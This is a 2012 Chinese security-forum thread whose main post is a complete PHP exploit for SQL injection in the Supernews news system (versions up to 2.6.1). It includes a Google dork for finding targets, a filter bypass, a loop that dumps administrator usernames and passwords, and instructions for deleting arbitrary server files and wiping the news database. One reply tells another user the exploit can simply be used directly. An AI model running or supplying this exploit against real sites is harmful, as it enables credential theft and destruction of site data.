查看: 10937|回复: 6

Supernews 2.6.1 sql注入漏洞

[复制链接]
  • TA的每日心情

    2024-11-13 20:06
  • 签到天数: 1628 天

    [LV.Master]伴坛终老

    发表于 2012-5-23 10:22:34 | 显示全部楼层 |阅读模式
    [code=PHP]<?php
    # Exploit Title: Supernews <= 2.6.1 SQL 注入漏洞
    # Google Dork: intext:"2003 - 2004 : SuperNews : Todos os direitos reservados"
    # Version: 2.6.1
    # Tested on: Debian GNU/Linux

    /*
    Exploit for educational purpose only.
    Note sent to the developer Fernando Pontes by e-mail 90@08sec.com

    SuperNews are a brazilian news system in PHP and MySQL.
    Versions priors to 2.6 have a simple SQL Injection on view news.
    The developer tried to fix the bug removing keywords like "union" and "select".
    But, with a recursion, it's possible to bypass this filters. See:
    seselectlect
    After removing "select" word, will stay another "select" word. See more:
    seSELECTlect

    Another SQL Injection on the administration panel:
    When deleting a post, you can inject SQL for delete all news on the database.

    Another vulnerability allows to delete files, on the administration panel:
    When deleting a post, a variable called "unlink" will talk to the system the new's image for delete.
    But it's possible to delete others files, typing all the file path or using "../".

    Usage:
    php exploit.php http://www.unhonker.com/supernews/

    For more info about vulnerabilities:
    php exploit.php moreinfo

    Example:
    $ php exploit.php http://www.unhonker.com/news/

    Supernews <= 2.6.1 SQL Injection Exploit

  • Trying to access server...
  • Detecting version... :-o
    [!] Version: >2.6.1 :-)
    [!] Administration panel: http://www.unhonker.com/news/admin/adm_noticias.php
    Type "exploit.php moreinfo" for get others vulnerabilities.
  • Getting user & pass 8-]
    User: user1
    Pass: pass1

    User: user2
    Pass: pass2

    Good luck! :-D

    */

    error_reporting(E_ERROR);
    set_time_limit(0);
    @ini_set("default_socket_timeout", 30);

    function hex($string){
        $hex=''; // PHP 'Dim' =]
        for ($i=0; $i < strlen($string); $i++){
            $hex .= dechex(ord($string[$i]));
        }
        return '0x'.$hex;
    }
    function str_replace_every_other($needle, $replace, $haystack, $count=null, $replace_first=true) {
        $count = 0;
        $offset = strpos($haystack, $needle);
        //If we don't replace the first, go ahead and skip it
        if (!$replace_first) {
            $offset += strlen($needle);
            $offset = strpos($haystack, $needle, $offset);
        }
        while ($offset !== false) {
            $haystack = substr_replace($haystack, $replace, $offset, strlen($needle));
            $count++;
            $offset += strlen($replace);
            $offset = strpos($haystack, $needle, $offset);
            if ($offset !== false) {
                $offset += strlen($needle);
                $offset = strpos($haystack, $needle, $offset);
            }
        }
        return $haystack;
    }
    function removeaddregex($str) {
      return str_replace_every_other('(.*)', '', $str, null, false);
    }
    function preg_quote_working($str) {
      $chars = explode(" ", "\ . + * ? [ ^ ] $ ( ) { } = ! < > | :");
      foreach($chars as $char) {
        $str = str_replace($char, "\\".$char, $str);
      }
      return $str;
    }

    echo "\nSupernews <= 2.6.1 SQL Injection Exploit";
    echo "\nCoded by 08sec - www.ihonker.org\nUse at your own risk.\n\n";

    if($argc!=2) {
      echo "Usage:
    php $argv[0] url
    Example:
    php $argv[0] http://www.unhonker.com/supernews
    php $argv[0] http://www.unhonker.com/supernews/";
      exit;
    }

    if($argv[1]=="moreinfo") {
      echo "\nMore vulnerabilities:
    - Deleting files
      You can delete files on the server, after login, using the URL:
       http://server.com/admin/adm_noticias.php?deleta=ID&unlink=FILE
      Replace \"ID\" with a valid post ID (will be deleted) and FILE with the file address on the server.

    - Deleting all news on the database:
      You can delete all news on the database with one request, only. Look:
       http://server.com/admin/adm_noticias.php?deleta=0%20or%201=1--+

      All vulnerabilities discovered by WCGroup.\n";
      exit;
    }

    $uri = $argv[1];
    if(substr($uri, -1, 1)!="/") {
      $uri .= "/";
    }
    $url = $uri."noticias.php?noticia=".urlencode("-1")."+";
    echo "\n
  • Trying to access server...";
    $accessvr = @file_get_contents($url);
    if(($accessvr==false) OR (preg_match("/(404|mysql_query)/", $accessvr))) {
      $url = $uri."index.php?noticia=".urlencode("-1")."+";
    }

    $token = substr(md5(chr(rand(48, 122))), 0, 10);

    echo "\n
  • Detecting version... :-o";

    $gettoken = strip_tags(file_get_contents($url.urlencode("union all select 1,2,3,4,".hex($token).",6,7-- ")));
    if(preg_match("/".$token."/", $gettoken)) {
      echo "\n[!] Version: >2.6.1 :-)";
      $version = 1;
    } else {
      $gettoken = strip_tags(file_get_contents($url.urlencode("uniunionon seleselectct 1,2,3,4,5,".hex($token).",7,8-- ")));
      if(preg_match("/".$token."/", $gettoken)) {
        echo "\n[!] Version =2.6.1 :-)";
        $version = 2;
      } else {
        echo "\n[-] Unknown version :-S";
        $version = 3;
      }
    }
    if($version!=3) {
      echo "\n[!] Administration panel: {$uri}admin/adm_noticias.php";
      echo "\n Type \"$argv[0] moreinfo\" for get others vulnerabilities.";
      echo "\n
  • Getting user & pass 8-]";
    }

    if($version==1) {
      $i = 0;
      while(true) {
        $request = strip_tags(file_get_contents($url.urlencode("union all select 1,2,3,4,concat(".hex($token).",user,".hex($token).",pass,".hex($token)."),6,7 from supernews_login limit $i,1-- ")));
        preg_match_all("/$token(.*)$token(.*)$token/", $request, $get);
        if($get[1][0]!="") {
          $user = $get[1][0];
          $pass = $get[2][0];
          echo "\nUser: $user\nPass: $pass\n";
          $i++;
        } else {
          echo "\nGood luck! :-D";
          break;
        }
      }
    }
    elseif($version==2) {
      $i = 0;
      while(true) {
        $request = strip_tags(file_get_contents($url.urlencode("uniunionon seleselectct 1,2,3,4,5,concat(".hex($token).",user,".hex($token).",pass,".hex($token)."),7,8 from supernews_login limit $i,1-- ")));
        preg_match_all("/$token(.*)$token(.*)$token/", $request, $get);
        if($get[1][0]!="") {
          $user = $get[1][0];
          $pass = $get[2][0];
          echo "\nUser: $user\nPass: $pass\n";
          $i++;
        } else {
          echo "\nGood luck! :-D";
          break;
        }
      }
    }
    else {
      echo "\n\nThis site are using an unknown version of Supernews or another CMS.";
      echo "\nPlease note that only versions <= 2.6.1 of Supernews are vulnerable.";
      echo "\nWebservers with modules or firewalls like \"mod_security\" aren't vulnerables.";
      echo "\nIf you want, try to access manually:";
      echo "\nThe vulnerability are on view notice file (index.php or noticia.php), in variable \"noticia\", a simple SQL Injection.";
      echo "\nWe're sorry.";
    }

    echo "\n";
    [/code]
  • 回复

    使用道具 举报

  • TA的每日心情

    2019-2-12 22:05
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2012-5-23 11:45:34 | 显示全部楼层
    沙发支持,
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2020-8-3 22:39
  • 签到天数: 84 天

    [LV.6]常住居民II

    发表于 2012-5-23 12:40:30 | 显示全部楼层
    都比我快,
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2022-3-19 16:56
  • 签到天数: 4 天

    [LV.2]偶尔看看I

    发表于 2012-5-23 23:46:09 | 显示全部楼层
    有点头晕
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2022-3-19 16:56
  • 签到天数: 4 天

    [LV.2]偶尔看看I

    发表于 2012-5-26 10:29:54 | 显示全部楼层
    这漏洞怎么用啊
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2020-8-3 22:39
  • 签到天数: 84 天

    [LV.6]常住居民II

    发表于 2012-5-26 13:49:53 | 显示全部楼层
    k红颜 发表于 2012-5-26 10:29
    这漏洞怎么用啊

    这是EXP。直接用就OK了
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-21 21:12 , Processed in 0.029030 second(s), 12 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部